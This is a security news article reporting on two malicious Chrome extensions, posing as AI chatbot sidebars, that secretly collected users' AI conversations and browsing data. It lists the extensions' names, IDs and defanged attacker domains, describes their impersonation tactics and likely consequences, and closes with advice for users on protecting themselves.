Security researchers have uncovered a disturbing new browser threat: two malicious Chrome extensions on the official Chrome Web Store that were designed to extract AI chatbot conversations and browsing activity from users’ browsers and send this information to remote attacker‑controlled servers. Combined, these extensions had been installed by about 900,000 users, putting a large population of individuals and organizations at risk of privacy invasion, corporate espionage, identity theft, and targeted phishing campaigns.

This incident highlights how browser extensions — especially those tied to AI tools — can be abused to siphon highly sensitive data without a user’s awareness, and underscores the urgent need for more effective vetting and monitoring of add‑ons in official marketplaces.

How the Threat Was Discovered

Cybersecurity analysts identified two seemingly legitimate Chrome extensions that, on the surface, marketed themselves as tools for integrating multiple AI services — including OpenAI’s ChatGPT, Anthropic’s Claude, and DeepSeek — directly into the browser. However, deep analysis revealed a far more sinister behavior: the add‑ons were automatically reading AI conversation content and browsing activity and transmitting it to remote servers under the attackers’ control every 30 minutes.

These extensions are:

  • Chat GPT for Chrome with GPT‑5, Claude Sonnet & DeepSeek AI — installed by roughly 600,000 users (extension ID fnmihdojmnkclgjpcoonokmkhjpjechg)
  • AI Sidebar with Deepseek, ChatGPT, Claude, and more — installed by about 300,000 users (extension ID inhcgfpbfdjbjogdfjbclgolkmhnooop)

Both were hosted on the Google Chrome Web Store, and one of them even carried a “Featured” badge at one point — a designation users often interpret as meaning the extension is vetted or trustworthy.

What the Malicious Extensions Actually Did

Once installed and granted permission, these extensions deceptively ask users to allow them to collect “anonymous, non‑identifiable analytics data” under the pretext of improving the sidebar AI experience. In reality, the code embedded in them actively:

  • Extracts user conversations with AI chatbots (such as ChatGPT and DeepSeek)
  • Reads Chrome tab URLs and browsing activity
  • Stores this data locally
  • Exfiltrates the harvested information to attacker‑controlled domains such as chatsaigpt[.]com and deepaichats[.]com on a recurring 30‑minute interval

The extraction mechanism works by scanning the Document Object Model (DOM) of the browser for text nodes associated with chatbot conversation fields, then capturing and uploading that text. This allows the extension to collect not just a user’s browsing history but potentially highly sensitive interaction data from AI tools where users may have discussed personal thoughts, business strategies, or confidential topics.

Impersonation and Distribution Tactics

The attackers behind these extensions intentionally modeled their products after a known legitimate add‑on — “Chat with all AI models (Gemini, Claude, DeepSeek…) & AI Agents” from a publisher called AITOPIA, which has around one million users. By mimicking the naming, layout, and description conventions of a trusted extension, they increased the chances that users would install the malicious copies without recognizing the difference.

Additionally, the malicious developers used an AI‑powered web development platform called Lovable to host their fake privacy policies and other superficially legitimate infrastructure (e.g., domains like chataigpt[.]pro and chatgptsidebar[.]pro) to further obfuscate their real intentions.

This tactic of deception through trusted branding and polished presentation is a hallmark of extension‑based malware campaigns: it lowers the threshold for user trust and increases the likelihood of installation.

Why This Attack Matters: Prompt Poaching and Beyond

Security researchers have begun referring to this type of attack as “prompt poaching” — because it involves quietly capturing user prompts and conversations with generative AI tools through an extension that users have willingly installed.

This technique was observed previously in other extensions like Urban VPN Proxy, which was found to be silently harvesting AI chat data from users and sending it to remote analytics servers. Prompt poaching represents a meaningful escalation in browser extension abuse because:

  • AI chat history can contain deeply personal or sensitive information, including business plans, confidential queries, strategic decisions, proprietary code snippets, health or legal discussions, and more.
  • Browser extensions — once granted permissions — have broad access to browser content and can operate with minimal visibility to users.
  • Combined with browsing activity data, captured AI conversations can provide a comprehensive picture of a user’s online behavior and interests.

The attackers behind the recently exposed extensions exploited these capabilities to systematically aggregate user data, making the threat not just a privacy issue but a potential tool for corporate espionage and identity theft.

Consequences for Users and Organizations

The impact of such malicious extensions goes far beyond personal annoyance or minor privacy leaks. Because the data exfiltrated by these extensions includes AI chatbot conversations and full browsing histories, the potential consequences include:

1. Corporate Espionage

Organizations with employees who installed these add‑ons may have inadvertently exposed internal communications, strategic discussions, planning sessions, and sensitive browser‑based workflows to external actors. Such intelligence could be used to gain competitive advantage or mount targeted attacks.

2. Identity Theft and Profiling

Collected AI conversations may include personal identifiers, preferences, saved credentials, or other personally identifiable information (PII) that attackers can exploit to commit identity fraud or account takeover.

3. Targeted Phishing and Social Engineering

With detailed records of browsing and AI interactions, attackers can craft extremely personalized phishing campaigns or social engineering lures that are harder for security filters and users to detect.

4. Exfiltration of Sensitive URLs

The extensions not only captured AI chats but also all open tab URLs, including internal corporate portal pages, cloud dashboards, and web applications that users might not want to share. This information can directly facilitate lateral network exploitation or targeted hacking.

Marketplace and Policy Implications

That these extensions were hosted on the official Chrome Web Store — one of the most trusted distribution platforms for browser add‑ons — raises serious questions about the effectiveness of current vetting processes. Chrome’s Web Store is expected to block malicious or privacy‑violating add‑ons, and the presence of these exfiltrating extensions suggests attackers are finding ways to bypass those checks or exploit loopholes.

Although one of the malicious extensions has lost its “Featured” badge — indicating that Google may be taking action — the fact that it was able to reach such widespread distribution before detection highlights the need for stronger automated scanning, runtime behavior analysis, and ongoing review.

How Users Can Protect Themselves

Given the stealthy nature of this attack and the broad reach of impacted extensions, users are advised to take the following precautions:

1. Remove Suspicious Extensions Immediately

If you have installed any third‑party extensions related to AI chat integration or browsers, especially those not published by well‑known developers, review and remove them. In particular, search for and uninstall:

  • Chat GPT for Chrome with GPT‑5, Claude Sonnet & DeepSeek AI
  • AI Sidebar with Deepseek, ChatGPT, Claude, and more

2. Review Extension Permissions

Before installing any extension, always check what permissions it requests. Be highly skeptical of add‑ons that ask to read data from all websites or access browsing activity.

3. Avoid Downloads from Unknown Sources

Even if an extension appears in search results or has many installs, don’t install it unless you are confident in its legitimacy and trustworthiness. High installation numbers alone do not guarantee safety.

4. Stay Informed About Security Alerts

Follow updates from browser vendors, cybersecurity firms, and reputable news outlets about extension threats, malware campaigns, and data privacy issues.

The Bigger Picture: Browser Extensions as a Security Weakness

This incident is part of a broader trend of browser extension abuse — where malicious actors weaponize legitimate‑appearing add‑ons to spy on users, redirect traffic, inject ads, steal credentials, or hijack sessions. Research indicates that malicious or compromised extensions can go undetected for long periods, sometimes due to weaknesses in vetting mechanisms and the sheer volume of submissions to extension marketplaces.

Whether via disguised AI tools, proxy utilities, or seemingly productive sidebar assistants, extensions can request powerful browser permissions that make it possible to monitor nearly all user activity. This makes them an ideal attack vector for data collection, user tracking, and espionage — not just casual privacy invasion.

Conclusion: Vigilance Is Essential in the Age of AI Extensions

The discovery of these two malicious Chrome extensions underscores a troubling reality: as AI tools become more integrated into web browsers, malicious actors are increasingly exploiting this trend to harvest sensitive user data under the guise of productivity. With nearly a million installs between them, these add‑ons demonstrate just how quickly browser threats can scale and how deeply they can infiltrate everyday workflows.

Users and administrators alike must remain vigilant about what extensions they install and maintain ongoing hygiene and review practices. Removing unknown or untrusted extensions, scrutinizing permissions, and staying current on security alerts are all essential steps to safeguard personal and organizational data against this growing class of browser extension threats.